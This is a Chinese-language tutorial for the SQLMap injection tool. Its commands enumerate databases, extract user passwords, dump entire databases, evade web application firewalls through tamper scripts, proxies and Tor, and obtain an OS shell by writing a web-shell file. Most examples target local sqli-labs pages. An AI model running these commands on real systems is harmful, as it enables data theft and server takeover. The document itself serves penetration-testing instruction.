SQLMap使用教程:从入门到入狱详细指南
项目地址:GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
SQLMap支持市面上常见的数据库:支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。基本上在进行渗透测试中,我们能见到的数据库都能进行测试。
SQLMap支持多种注入手法:
- 基于布尔的盲注,即可以根据返回页面判断条件真假的注入;
- 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;
- 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;
- 联合查询注入,可以使用 union 的情况下的注入;
- 堆查询注入,可以同时执行多条语句的执行时的注入。
总而言之:SQLMap足以取代我们在渗透测试对SQL注入漏洞的手工测试。通过本篇文章,您将解放双手,灵活的进行SQL注入漏洞测试。话不多说,发车了!!!
SQLMap支持多种功能:数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。
常用参数介绍
-v #详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
建议使用等级 3 ,可以看到注入语句的Payload,利于入门者学习。
-u "http://xxx/Less-1/?id=1" 注入点
-f #指纹判别数据库类型
-b #获取数据库版本信息
-p #指定可测试的参数(?page=1&id=2 -p "page,id")
--level=(1-5) #要执行的测试水平等级,默认为1 level 算是一共注入测试等级,一共是五级,级别越高,检测的内容也就越多,检测级别大于等于 2 时会检测 cookie 是否有注入,检测级别大于等于 3 时会检测 User-Agent 和 Referer 是否有注入。比较推荐使用 5 等级进行测试,确保不会漏掉注入点。
--risk=(0-3) #测试执行的风险等级,默认为1 一共有3个危险等级,也就是说你认为这个网站存在几级的危险等级。和探测等级一个意思,在不确定的情况下,建议设置为3级
--time-sec=(2,5) #延迟响应,默认为5
--data #通过POST发送数据
--columns #列出字段
--current-user #获取当前用户名称
--current-db #获取当前数据库名称
--users #列数据库所有用户
--passwords #数据库用户所有密码
--privileges #查看用户权限(--privileges -U root)
--dbs #列出所有数据库
--tables -D "" #列出指定数据库中的表
--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段
--dump-all #列出所有数据库所有表
--dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname)
--is-dba #是否是数据库管理员
--data "" #POST方式提交数据(--data "page=1&id=2")
--cookie "用;号分开" #cookie注入(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”)
--referer "" #使用referer欺骗(--referer "http://www.baidu.com")
--user-agent "" #自定义user-agent
基本必会操作
测试GET注入
python sqlmap.py -u "http://127.0.0.1/Less-1/?id=1" -p "id"
测试POST注入
python sqlmap.py -u "http://127.0.0.1/Less-11/" --data="uname=123&passwd=123"
测试Cookie注入
python sqlmap.py -u "https://127.0.0.1" --cookie "customerId=591edabaab5b52292042df8a"
测试SQL注入漏洞是否存在:直接一把梭哈
python sqlmap.py -u "http://127.0.0.1/Less-14/" --level=5 --risk=3
直接指定最高 level,risk 等级,这样可以不漏掉任何一个测试点,但是代价就是比较慢。这个情况适合时间充裕以及最后完全没有办法的梭哈策略。
测试数据包指定字段
使用BurpSuite抓取数据包,对需要测试的位置后面加上 *
POST /Less-11/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Less-11/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
uname=123*&passwd=123*&submit=Submit
执行语句:
python sqlmap.py -r test.txt -v 3
通过这种方式我们就可以实现对我们想要测试的位置进行测试。
获取数据库信息
查看数据库所有用户:
sqlmap -u "http://xxx/Less-1/?id=1" --users
查看数据库所有用户名密码:
sqlmap -u "http://xxx/Less-1/?id=1" --passwords
查看数据库当前用户:
sqlmap -u "http://xxx/Less-1/?id=1" --current-user
查看当前数据库用户是否具有root权限:
sqlmap -u "http://xxx/Less-1/?id=1" --is-dba
查看所有数据库:
sqlmap -u "http://xxx/sqli/Less-1/?id=1" --dbs
查看指定数据库的所有表:
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security --tables
查看指定表的所有列:
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users --columns
查看指定列下的数据:
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users -C username --dump
脱裤:
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users --dump-all #爆出数据库security中的users表中的所有数据
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security --dump-all #爆出数据库security中的所有数据
sqlmap -u "http://xxx/sqli/Less-1/?id=1" --dump-all #爆出该数据库中的所有数据
高端使用指南
WAF绕过
首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现,因为我们在漏扫或者使用专门工具来检测是否有WAF,这个检测,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我们可以利用这些来判断。在此我们,也介绍使用sqlmap 进行检测是否否WAF/IPS/IDS
sqlmap -u "" --thread 10 --identify-waf //首选
sqlmap -u "" --thread 10 --check-waf //备选
使用任意浏览器进行绕过,尤其是在WAF配置不当的时候
sqlmap -u "" --random-agent -v 2
使用HTTP 参数污染进行绕过
sqlmap -u "" --hpp -v 3
使用长的延时来避免触发WAF的机制,这方式比较耗时
sqlmap -u "" --delay=3.5 --time-sec=60
使用代理进行注入
sqlmap -u "" --proxy=211.211.211.211:8080 --proxy-cred=211:985
匿名注入
sqlmap -u "" --tor
使用脚本绕过
sqlmap 官方提供了53个绕过脚本,脚本目录在/usr/share/sqlmap/tamper中
指定单个脚本:
sqlmap -u "http://xxx/Less-1/?id=1" --tamper=space2plus.py
指定多个脚本:
sqlmap -u "http://xxx/Less-1/?id=1" --tamper="space2comment.py,space2plus.py"
操作系统命令执行
在数据库为MySQL、PostgreSql或者SQL Server时,可以通过sqlmap执行操作系统命令
当为MySQL数据库时,需满足下面条件:
- 当前用户为 root
- 知道网站根目录的绝对路径
执行命令
python sqlmap.py -u "127.0.0.1/Less-1/?id=1" --os-shell
之后会要求选择脚本语言:
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
>
之后会要求我们选择路径
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
>
【1】使用公共的默认目录(C:/xampp/htdocs/,C:/wamp/www,C:/Inetpub/wwwroot/)
【2】自定义网络根目录绝对路径
【3】指定自定义的路径文件
【4】暴力破解
执行os-shell的过程中,sqlmap会向网站根目录写入两个文件 tmpblwkd.php 和 tmpueqch.php。真正的木马文件是tmpblwkd.php 。如果是非正常退出sqlmap的话,这两个文件不会被删除。只有当我们输入 x 或 q 退出 sqlmap 时,该文件才会被自动删除。
测试:执行命令dir
湘公网安备 43102202000103号